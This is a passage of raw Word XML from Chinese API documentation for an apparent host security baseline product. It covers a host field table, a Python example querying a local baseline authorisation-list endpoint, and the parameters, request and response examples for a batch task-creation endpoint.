          <w:p w14:paraId="466C4F5D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="61467D08" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E8349C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DB207B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21DE1E8B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="28FC5F27" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68378122" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3461DE67" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="299DE239" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0BA73321" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74DB28B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16B5F49C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D75CF86" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6308E2FE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28613E99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35AB439B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="064D6ADA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66F91425" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C86C287" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>#! /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bin/env python</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import requests</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>host = "127.0.0.1"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>port = 80</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>app_auth_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/api/baseline/auth/list/linux?comId=1e46b07f93a6410172c4&amp;uuid=1e46b07f93a6410172c4&amp;authToken=557cc4d3cc45414d9438173a3cd1296c&amp;osType=1&amp;appName=WebLogic" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>querystring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = {"comId":"1e46b07f93a6410172c4","uuid":"1e46b07f93a6410172c4","authToken":"557cc4d3cc45414d9438173a3cd1296c","osType":"1","appName":"WebLogic"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>requests.request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("GET", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, params=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>querystring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>response.text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E1B53E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="375" w:name="_Toc115166260"/>
      <w:bookmarkStart w:id="376" w:name="批量新建任务"/>
      <w:bookmarkEnd w:id="374"/>
      <w:r>
        <w:t>批量新建任务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="375"/>
    </w:p>
    <w:p w14:paraId="65F303A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DF3E36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/baseline/job/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>multilinux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>multiwin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6267B9"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423"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="4777"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="7CF73CB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331F056" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DDDDBB3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63422E4D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="443B1B9D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33E195F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7043223C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A853B27" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务名，必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="12E57CC4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A9F24B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>kind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36502951" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C4DE20A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>必填，范围类型 0-主机 1-业务组 2-全部</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="18A5953E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08F02A99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="009ED653" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6890DE1B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>kind=0时必填，所选主机列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7B72B98C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="235B2BE4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BAF7E6D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16920912" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>kind=1时必填，所选业务组列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="54269E6B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B453108" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ruleIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="287705CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79267A16" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>必填，基线规则id列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="073CBA09" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68985598" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cronEnabled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3718A98C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="482D26F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>必填，是否定时任务 true-定时任务 false-普通任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5C667D1C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FB998C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E25E167" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E451C97" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cronEnabled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=true必填，</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>任务表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5DC11A4D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62DA741C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71A54750" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CADAC8A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="541AD2AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2410A3AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">       "name": "test_001",  //必填，任务名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "kind": 1,  //必填，范围类型 0-主机 1-业务组 2-全部</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "values": ["407c1dd87b1d7771"],  //kind=0时必填，所选主机列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "groups": [1, 3, 446],  //kind=1时必填，所选业务组列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ruleIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ["1b8094cf2cacf0e42acf","1b8094cf2cacf0e42abc"]  //必填，基线规则id列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cronEnabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false,  //必填，是否定时任务 true-定时任务 false-普通任务</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "0 17 * * *",  //</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cronEnabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=true必填，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>任务表达式</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "description": "xxx"  //任务描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D639DC8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A8C025" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>status":"success</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",//任务创建状态</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "ids": ["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"] //成功创建的任务</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>specId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>failedRuleIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"] //创建失败的规则列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E03804" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常情景</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D1AC7F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ruleIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>为空, 会抛出相应的异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D36312"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458"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="3623"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="09AFB2D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F8C88B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D6508B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="280CAF59" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="36E1F32E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="346C9CDA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45CA1A42" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="755E1F41" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务创建状态,全部创建失败时才算失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="44BE435F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="153AFB36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>ids</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
